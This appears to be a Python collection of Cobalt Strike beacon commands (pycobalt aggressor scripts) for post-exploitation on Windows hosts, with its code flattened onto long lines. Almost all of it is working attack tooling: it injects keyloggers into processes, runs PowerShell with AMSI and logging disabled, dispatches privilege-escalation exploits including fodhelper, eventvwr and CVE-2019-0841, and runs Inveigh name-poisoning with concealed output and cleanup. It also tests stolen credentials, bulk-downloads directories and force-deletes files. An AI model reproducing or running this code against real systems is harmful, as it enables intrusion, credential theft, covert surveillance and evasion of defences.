def _(bid, code, *args): aggressor.btask(bid, 'Tasked beacon to execute C# code: {}'.format(code)) try: sharpgen.execute(bid, code, *args) except RuntimeError as e: aggressor.berror( bid, 'SharpGen failed. See script console for more details')
def _(bid, *proc_names): if not proc_names: # defaults proc_names = default_procs def parsed_callback(procs): found = None for search in proc_names: for proc in procs: if search == proc['name'] and 'arch' in proc and 'user' in proc: # inject it aggressor.blog( bid, 'Keylogging process {} ({} {})'.format( proc['name'], proc['pid'], proc['arch'])) aggressor.bkeylogger(bid, proc['pid'], proc['arch'], silent=True) return # nothing found aggressor.berror(bid, "Didn't find any processes to inject keylogger") def ps_callback(bid, content): procs = helpers.parse_ps(content) parsed_callback(procs) aggressor.btask( bid, 'Tasked beacon to keylog first accessible process named: ' + ', '.join(proc_names)) aggressor.bps(bid, ps_callback)
def run(bid, program, args=None, silent=False): # no args if not args: args = [] if program in assemblies: assembly = assemblies[program] args = helpers.eaq(args) if not silent: aggressor.btask(bid, 'Tasked beacon to run {} {}'.format(program, args)) aggressor.bexecute_assembly(bid, assembly, args, silent=True) elif program in powershell: script = powershell[program] aggressor.bpowershell_import(bid, script) if isinstance(args, list) or isinstance(args, tuple): args = ' '.join(powershell_quote(args)) aggressor.bpowerpick(bid, ' '.join(args)) elif program in callbacks: callback = callbacks[program] callback(bid, args, silent=silent) else: raise RuntimeError('Unrecognized program: {}'.format(program))
def custom_powerpick(bid, command, silent=False, auto_host=True): # public static string PowerShellExecute(string PowerShellCode, bool OutString = true, bool BypassLogging = true, bool BypassAmsi = true) code = helpers.code_string(r""" string powershell = String.Join("\n", args); var results = Execution.PowerShell.RunAsync(powershell, disableLogging: true, disableAmsi: true, bypassExecutionPolicy: true); foreach (string result in results) { Console.Write(result); } """) if not silent: aggressor.btask( bid, 'Tasked beacon to run: {} (custom unmanaged)'.format( command.replace('\n', ' '))) # include cradle for `powershell-import`/`bpowershell_import` cradle = aggressor.beacon_host_imported_script(bid) if cradle: command = cradle + '\n' + command # if the script is too long, host it if auto_host and len(command) > max_script_size: command = aggressor.beacon_host_script(bid, command) engine.message(command) references = [ 'mscorlib.dll', 'System.dll', 'System.Core.dll', 'System.Management.Automation.dll' ] sharpgen.execute(bid, code, [''] + command.split('\n'), references=references, resources=[], cache=sharpgen_cache)
def _(bid, exploit, *args): callbacks = { 'token-shellcode': elevate_token_shellcode, 'token-command': elevate_token_command, 'slui-shellcode': elevate_slui_shellcode, 'slui-command': elevate_slui_command, 'fodhelper-shellcode': elevate_fodhelper_shellcode, 'fodhelper-command': elevate_fodhelper_command, 'eventvwr-command': elevate_eventvwr_command, 'wscript-shellcode': elevate_wscript_shellcode, 'wscript-command': elevate_wscript_command, 'runas-shellcode': elevate_runas_shellcode, 'cve-2019-0841': elevate_cve_2019_0841, } if exploit in callbacks: aggressor.btask( bid, 'Tasked beacon to elevate with exploit: {}'.format(exploit)) callback = callbacks[exploit] if not pycobalt.utils.check_args(callback, (bid, ) + args): signature = pycobalt.utils.signature(callback, trim=1) aggressor.berror( bid, 'Invalid arguments to exploit {}. Signature: {}'.format( exploit, signature)) return callback(bid, *args) else: aggressor.berror( bid, 'Exploit must be one of: {}'.format(', '.join(callbacks.keys())))
def _(bid): command = textwrap.dedent(""" wmic os get Caption /value | more wmic qfe """) aggressor.btask(bid, 'Tasked beacon to get patch status') aggressor.bpowerpick(bid, command, silent=True)
def _(bid): command = '' for d in ['Desktop', 'Documents', 'Downloads', 'Favorites']: command += 'ls $env:userprofile\\{}\n'.format(d) aggressor.btask(bid, 'Tasked beacon to show common document folders') aggressor.bpowerpick(bid, command, silent=True)
def _(bid): command = textwrap.dedent(""" ls $env:localappdata ls $env:appdata """) aggressor.btask(bid, 'Tasked beacon to show AppData') aggressor.bpowerpick(bid, command, silent=True)
def _(bid): command = helpers.code_string(r""" Get-Process | Where { $_.mainWindowTitle } | Format-Table id,name,mainwindowtitle -AutoSize """) aggressor.btask(bid, 'Tasked beacon to list open windows') aggressor.bpowerpick(bid, command, silent=True)
def _(bid, *hosts): exe = '/share/tools/post_exploitation/TestAntivirus/bin/Release/net35/TestAntivirus.exe' if hosts: aggressor.btask(bid, 'Tasked beacon to check AV on: ' + ', '.join(hosts)) else: aggressor.btask(bid, 'Tasked beacon to check local AV') aggressor.bexecute_assembly(bid, exe, helpers.eaq(hosts), silent=True)
def _(bid, *directories): def callback(path): aggressor.bdownload(bid, path) for directory in directories: aggressor.btask( bid, 'Tasked beacon to recurse {} for files to download'.format( directory)) helpers.recurse_ls(bid, directory, callback)
def _(bid): command = textwrap.dedent(r""" Get-Childitem -path env:* | Select-Object Name, Value | Sort-Object name | Format-Table -Auto """) aggressor.btask(bid, 'Tasked beacon to get environmental variables') aggressor.bpowerpick(bid, command, silent=True)
def _(bid): command = textwrap.dedent(r""" Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, InstallDate | Sort-Object -Property DisplayName | Format-Table -AutoSize """) aggressor.btask(bid, 'Tasked beacon to get list of uninstallers') aggressor.bpowerpick(bid, command, silent=True)
def _(bid, code, *args): aggressor.btask(bid, 'Tasked beacon to execute C# code: {}'.format(code)) try: from_cache = sharpgen.execute(bid, code, args, cache=cache) if from_cache: aggressor.blog2(bid, 'Build was retrieved from the cache') except RuntimeError as e: aggressor.berror( bid, 'SharpGen failed. See Script Console for more details.')
def _(bid, runtime=99999, *args): aggressor.bpowershell_import( bid, utils.basedir('powershell/Inveigh/Inveigh.ps1')) aggressor.btask( bid, 'Tasked beacon to run inveigh with output files at %userprofile%\\AppData\\Roaming\\Microsoft' ) aggressor.bpowerpick( bid, r"Invoke-Inveigh -FileOutput Y -FileOutputDirectory $env:userprofile\AppData\Roaming\Microsoft -RunTime {} -Tool 2 -LLMNR Y -NBNS Y -StatusOutput Y {}" .format(runtime, ' '.join(args)))
def _(bid): command = helpers.code_string(r""" wmic os get Caption /value Get-WmiObject -class Win32_quickfixengineering | Select-Object HotFixID,Description,InstalledBy,InstalledOn | Sort-Object InstalledOn -Descending | Format-Table -Auto """) aggressor.btask(bid, 'Tasked beacon to get patch info') aggressor.bpowerpick(bid, command, silent=True)
def _(bid, home=None): if not home: home = helpers.guess_home(bid) directory = r'{}\AppData\Roaming\Microsoft'.format(home) aggressor.btask( bid, 'Tasked beacon to remove inveigh files in {}'.format(directory)) for fname in ('clear', 'log', 'v1', 'v2', 'form'): aggressor.brm(bid, r'{}\{}'.format(directory, fname))
def _(bid): command = helpers.code_string(r""" if (([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")) { echo "User is a local admin!"; } else { echo "User is not local admin :("; } """) aggressor.btask(bid, 'Tasked beacon to check if user is a local admin') aggressor.bpowerpick(bid, command, silent=True)
def _(bid, fname, lines=10): code = helpers.code_string(r""" string file = args[0]; int lines = Int32.Parse(args[1]); string text = string.Join("\r\n", System.IO.File.ReadLines(file).Take(lines)); System.Console.WriteLine(text); """) aggressor.btask('Tasked beacon to get first {} lines of {}'.format( lines, fname)) sharpgen.execute(bid, code, (fname, lines))
def _(bid): command = helpers.code_string(r""" If ((gwmi win32_computersystem).partofdomain){ Write-Output "User is in domain: $env:userdomain" } Else { Write-Output "User is not in a domain" } """) aggressor.btask(bid, "Tasked beacon to check if it's in a domain") aggressor.bpowerpick(bid, command, silent=True)
def _(bid, *dirs): # default dir is . if not dirs: dirs = ['.'] command = 'ls ' command += ', '.join([powershell_quote('{}\*\*'.format(d)) for d in dirs]) aggressor.btask(bid, 'Tasked beacon to list */* in: {}'.format(', '.join(dirs))) aggressor.bpowerpick(bid, command, silent=True)
def callback(procs): if procs: for proc in procs: out = 'Killing {}: {}'.format(proc_name, proc['pid']) if 'arch' in proc: out += ' ({})'.format(proc['arch']) if 'user' in proc: out += ' ({})'.format(proc['user']) aggressor.btask(bid, out) aggressor.bkill(bid, proc['pid'], silent=True) else: aggressor.berror(bid, 'No processes named {}'.format(proc_name))
def _(bid, last=50): command = helpers.code_string(r""" $hist = (Get-Content "$env:appdata\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt" -EA 0 | Select -last {}) if ($hist) {{ $hist -Join "`r`n" }} else {{ "No Powershell history found" }} """.format(last)) aggressor.btask(bid, 'Tasked beacon to show {} items of powershell history'.format(last)) aggressor.bpowerpick(bid, command, silent=True)
def _(bid, *dirs): if not dirs: aggressor.berror(bid, 'rmr: specify some directories to kill') return command = '' for d in dirs: command += 'Remove-Item -Recurse -Force {}\n'.format( powershell_quote(d)) aggressor.btask( bid, 'Tasked beacon to recursively delete: {}'.format(', '.join(dirs))) aggressor.bpowerpick(bid, command, silent=True)
def _(bid, *dirs): # default dir is . if not dirs: dirs = ['.'] command = '' for d in dirs: command += 'Get-ChildItem -Recurse {}\n'.format(powershell_quote(d)) aggressor.btask( bid, 'Tasked beacon to recursively list files in: {}'.format( ', '.join(dirs))) aggressor.bpowerpick(bid, command, silent=True)
def _(bid, *hosts): command = '' if not hosts: aggressor.berror('specify a host') return for host in hosts: command += 'nslookup {}\n'.format(powershell_quote(host)) aggressor.btask( bid, 'Tasked beacon to resolve host(s): {}'.format(', '.join(hosts))) aggressor.bpowerpick(bid, command, silent=True)
def _(bid, *users): if users: aggressor.btask( bid, 'Tasked beacon to list files in user profiles for: {}'.format( ', '.join(users))) for user in users: aggressor.bls(bid, r'C:\Users\{}'.format(user), silent=True) else: aggressor.btask(bid, 'Tasked beacon to list files in each user profile') aggressor.bpowerpick(bid, r'ls C:\Users | ForEach-Object { ls $_; }', silent=True)
def _(bid, username, password): command = helpers.code_string(r""" if ((new-object directoryservices.directoryentry "", "{username}", "{password}").psbase.name -ne $null) {{ Write-Host "Credentials {username}:{password} are valid :)" }} else {{ Write-Host "Credentials {username}:{password} are not valid :(" }} """.format(username=username, password=password)) aggressor.btask( bid, 'Tasked beacon to test credentials {}:{}'.format(username, password)) aggressor.bpowerpick(bid, command, silent=True)
def _(bid, *dirs): # default dir is . if not dirs: dirs = ['.'] command = '' for d in dirs: command += 'Get-ChildItem {} | % {{ fsutil reparsepoint query $_ }}\n'.format( powershell_quote(d)) aggressor.btask( bid, 'Tasked beacon to list links in: {}'.format(', '.join(dirs))) aggressor.bpowerpick(bid, command, silent=True)
def _(bid, *args): global _uploaded if not _uploaded: aggressor.berror('Run 7z-init first') return line = ' '.join(args) aggressor.btask(bid, 'Tasked beacon to run 7zip command: {}'.format(line)) aggressor.bpowerpick( bid, "echo '7zip starting'; {} {} ; echo '7zip finished';".format( _uploaded, line), silent=True)